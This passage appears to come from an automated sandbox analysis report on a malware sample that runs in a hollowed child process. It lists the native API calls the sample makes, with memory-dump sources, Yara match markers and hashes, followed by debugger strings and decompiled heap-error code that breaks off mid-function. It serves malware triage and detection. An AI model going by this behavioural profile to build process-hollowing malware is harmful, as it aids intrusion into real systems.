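Run against the full report text, the per-process list is the behavioural summary a triage note needs (which native APIs the hollowed child process calls, and from which addresses), while the Opcode ID lists show how many disassembled functions the sandbox attributed each call site to; an immediate that passes `looks_like_x86_prologue` is a hint that the listing it came from is a mis-aligned decode rather than a distinct function.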
                                                                        APIs
                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Load
                                                                        • String ID:
                                                                        • API String ID: 2234796835-0
                                                                        • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                        • Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
                                                                        • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                        • Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                        • Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
                                                                        • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                        • Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 5307474825cd8e66656a307a80e88224dd1c1e60fd1869cddec59822e3164bf9
                                                                        • Instruction ID: d762fb2db014eb627c0b73c0f32ef6c6772fa739a57ca419a0c343087aab13c9
                                                                        • Opcode Fuzzy Hash: 5307474825cd8e66656a307a80e88224dd1c1e60fd1869cddec59822e3164bf9
                                                                        • Instruction Fuzzy Hash: 92F0C4B2200108AFCB08CF88DC94EEB37A9AF8C354F15864CFA0D97240C630E855CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                        • Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
                                                                        • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                        • Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID:
                                                                        • API String ID: 3535843008-0
                                                                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                        • Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
                                                                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                        • Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID:
                                                                        • API String ID: 3535843008-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateMemoryVirtual
                                                                        • String ID:
                                                                        • API String ID: 2167126740-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID:
                                                                        • API String ID: 1836367815-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID:
                                                                        • API String ID: 1836367815-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: 40c3feda1a0090b62ef2a2e4fc792ab9fdb08d198427710ded3ced6e77b51b31
                                                                        • Instruction ID: 9526831faa348651f2484f90e7168772543a8e34bcaec901cdf911bad1e22b48
                                                                        • Opcode Fuzzy Hash: 40c3feda1a0090b62ef2a2e4fc792ab9fdb08d198427710ded3ced6e77b51b31
                                                                        • Instruction Fuzzy Hash: F2017CB52002086FDB14EF59DC81DEB73A9AF89344F118519FD4897342CA31E811CBB1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID:
                                                                        • API String ID: 1836367815-0
                                                                        • Opcode ID: 0e510526a822c27e4e5420c908410d0eb3a79bf92e8f0f1666aa0ba59499d36b
                                                                        • Instruction ID: fac4ecfdd03cfaffe3467678bf3474436e2a865f0ca8206eb13de90e01009138
                                                                        • Opcode Fuzzy Hash: 0e510526a822c27e4e5420c908410d0eb3a79bf92e8f0f1666aa0ba59499d36b
                                                                        • Instruction Fuzzy Hash: AAF02831A4162876EB106A809C02FFF76189B40B15F1542AFFE04BE2C2D6BC7D4547EA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: 3214013f66299b9ec9659f2cf2444aab677b4a7a88e144fb66d458a9ec8bc226
                                                                        • Instruction ID: bf59ea738fe121061337fae3b95696833655653364d8b0cac5f8001011917114
                                                                        • Opcode Fuzzy Hash: 3214013f66299b9ec9659f2cf2444aab677b4a7a88e144fb66d458a9ec8bc226
                                                                        • Instruction Fuzzy Hash: 10F03075200104AFCB20DF55CCC5EDB776AEF89354F108659F90997346CA35E802CBE4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID:
                                                                        • API String ID: 3298025750-0
                                                                        • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                        • Instruction ID: 0c1265b7fbf046cbfd36917309396888787f1b5b9f48543de1c0af89871077f5
                                                                        • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                        • Instruction Fuzzy Hash: 2EE01AB12002046BD714DF59DC45EA777ACAF88750F014559F90857241CA30E9108AB0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                        • Instruction ID: d4cd8ba0fc8cb19801f053331f4cf649e26225416c3eadc5d6da7764d9533391
                                                                        • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                        • Instruction Fuzzy Hash: 81E012B1200208ABDB14EF99DC41EA777ACAF88654F118559FA085B282CA30F9108AB0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                        • Instruction ID: a95af6b202be8dae21372797db95a078404a8f30fafd20f5c772dce95c9aa66f
                                                                        • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                        • Instruction Fuzzy Hash: 31E01AB12002086BDB10DF49DC85EE737ADAF89650F018559FA0857241CA34E8108BF5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:
                                                                        • API String ID: 621844428-0
                                                                        • Opcode ID: 1c4cc6f8cc0e93b3c838202e3c57c0338ed1b98d18bfe31162352ff5644ddf1d
                                                                        • Instruction ID: eccf089e1a1bc705cc3b456848f8173232ab1a7a121b49f52e112349bbe0fbc4
                                                                        • Opcode Fuzzy Hash: 1c4cc6f8cc0e93b3c838202e3c57c0338ed1b98d18bfe31162352ff5644ddf1d
                                                                        • Instruction Fuzzy Hash: 05E0DF34201314BBD320DF54CC81FCB3B589F09644F01845CB9085B242C671AA0086E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:
                                                                        • API String ID: 621844428-0
                                                                        • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                        • Instruction ID: 7205fd5e3e27dabd4e13006f85928de99448ffddaf0958f387cae24292a3a6f6
                                                                        • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                        • Instruction Fuzzy Hash: ACD012716003147BD620DF99DC85FD7779CDF49750F018469BA1C5B241C931BA0086E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 1e900e82c68e766a3bc2d72a701a9f93520991b4f1773a1909416aebada7a2f4
                                                                        • Instruction ID: 6d03cf7c32b9916c122347de86b11622598d43f9cfa442e57990470419eb66c3
                                                                        • Opcode Fuzzy Hash: 1e900e82c68e766a3bc2d72a701a9f93520991b4f1773a1909416aebada7a2f4
                                                                        • Instruction Fuzzy Hash: FDB09B71D015D5C9D611D7A44608717798477D0746F56C061D1060641F4778C095F5F5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Strings
                                                                        • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0199B53F
                                                                        • The instruction at %p tried to %s , xrefs: 0199B4B6
                                                                        • Go determine why that thread has not released the critical section., xrefs: 0199B3C5
                                                                        • an invalid address, %p, xrefs: 0199B4CF
                                                                        • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0199B305
                                                                        • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0199B323
                                                                        • <unknown>, xrefs: 0199B27E, 0199B2D1, 0199B350, 0199B399, 0199B417, 0199B48E
                                                                        • *** Inpage error in %ws:%s, xrefs: 0199B418
                                                                        • This failed because of error %Ix., xrefs: 0199B446
                                                                        • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0199B484
                                                                        • *** Resource timeout (%p) in %ws:%s, xrefs: 0199B352
                                                                        • The instruction at %p referenced memory at %p., xrefs: 0199B432
                                                                        • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0199B3D6
                                                                        • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0199B39B
                                                                        • write to, xrefs: 0199B4A6
                                                                        • *** enter .exr %p for the exception record, xrefs: 0199B4F1
                                                                        • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0199B2DC
                                                                        • *** An Access Violation occurred in %ws:%s, xrefs: 0199B48F
                                                                        • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0199B314
                                                                        • *** enter .cxr %p for the context, xrefs: 0199B50D
                                                                        • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0199B38F
                                                                        • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0199B476
                                                                        • *** then kb to get the faulting stack, xrefs: 0199B51C
                                                                        • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0199B2F3
                                                                        • read from, xrefs: 0199B4AD, 0199B4B2
                                                                        • a NULL pointer, xrefs: 0199B4E0
                                                                        • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0199B47D
                                                                        • The critical section is owned by thread %p., xrefs: 0199B3B9
                                                                        • The resource is owned shared by %d threads, xrefs: 0199B37E
                                                                        • The resource is owned exclusively by thread %p, xrefs: 0199B374
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.708636866.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                        • API String ID: 0-108210295
                                                                        • Opcode ID: 79f56eec9a1813901ac2cf2a04bfd27f4679f00ed21ed3c9b9628197a5900f2a
                                                                        • Instruction ID: 187ecbf06cdf2c6e3e739cf9e7891a9f02aaff3ed9e9abb190d71089d007591d
                                                                        • Opcode Fuzzy Hash: 79f56eec9a1813901ac2cf2a04bfd27f4679f00ed21ed3c9b9628197a5900f2a
                                                                        • Instruction Fuzzy Hash: A3812531B41300FFEF21AA4EAC86D6B3B39EFA6B52F014048F50D9B252D2698601D772
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 44%
                                                                        			E019A1C06() {
                                                                        				signed int _t27;
                                                                        				char* _t104;
                                                                        				char* _t105;
                                                                        				intOrPtr _t113;
                                                                        				intOrPtr _t115;
                                                                        				intOrPtr _t117;
                                                                        				intOrPtr _t119;
                                                                        				intOrPtr _t120;
                                                                        
                                                                        				_t105 = 0x18c48a4;
                                                                        				_t104 = "HEAP: ";
                                                                        				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                        					_push(_t104);
                                                                        					E018EB150();
                                                                        				} else {
                                                                        					E018EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                        				}
                                                                        				_push( *0x19d589c);
                                                                        				E018EB150("Heap error detected at %p (heap handle %p)\n",  *0x19d58a0);
                                                                        				_t27 =  *0x19d5898; // 0x0
                                                                        				if(_t27 <= 0xf) {
                                                                        					switch( *((intOrPtr*)(_t27 * 4 +  &M019A1E96))) {
                                                                        						case 0:
                                                                        							_t105 = "heap_failure_internal";
                                                                        							goto L21;
                                                                        						case 1:
                                                                        							goto L21;
                                                                        						case 2:
                                                                        							goto L21;
                                                                        						case 3:
                                                                        							goto L21;
                                                                        						case 4:
                                                                        							goto L21;
                                                                        						case 5:
                                                                        							goto L21;
                                                                        						case 6:
                                                                        							goto L21;
                                                                        						case 7:
                                                                        							goto L21;
                                                                        						case 8:
                                                                        							goto L21;
                                                                        						case 9:
                                                                        							goto L21;
                                                                        						case 0xa:
                                                                        							goto L21;
                                                                        						case 0xb:
                                                                        							goto L21;
                                                                        						case 0xc:
                                                                        							goto L21;
                                                                        						case 0xd:
                                                                        							goto L21;
                                                                        						case 0xe:
                                                                        							goto L21;
                                                                        						case 0xf:
                                                                        							goto L21;
                                                                        					}
                                                                        				}
                                                                        				L21:
                                                                        				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                        					_push(_t104);
                                                                        					E018EB150();
                                                                        				} else {
                                                                        					E018EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                        				}
                                                                        				_push(_t105);
                                                                        				E018EB150("Error code: %d - %s\n",  *0x19d5898);
                                                                        				_t113 =  *0x19d58a4; // 0x0
                                                                        				if(_t113 != 0) {
                                                                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                        						_push(_t104);
                                                                        						E018EB150();
                                                                        					} else {
                                                                        						E018EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                        					}
                                                                        					E018EB150("Parameter1: %p\n",  *0x19d58a4);
                                                                        				}
                                                                        				_t115 =  *0x19d58a8; // 0x0
                                                                        				if(_t115 != 0) {
                                                                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                        						_push(_t104);
                                                                        						E018EB150();
                                                                        					} else {
                                                                        						E018EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                        					}
                                                                        					E018EB150("Parameter2: %p\n",  *0x19d58a8);
                                                                        				}
                                                                        				_t117 =  *0x19d58ac; // 0x0
                                                                        				if(_t117 != 0) {
                                                                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                        						_push(_t104);
                                                                        						E018EB150();
                                                                        					} else {
                                                                        						E018EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                        					}
                                                                        					E018EB150("Parameter3: %p\n",  *0x19d58ac);
                                                                        				}
                                                                        				_t119 =  *0x19d58b0; // 0x0
                                                                        				if(_t119 != 0) {
                                                                        					L41:
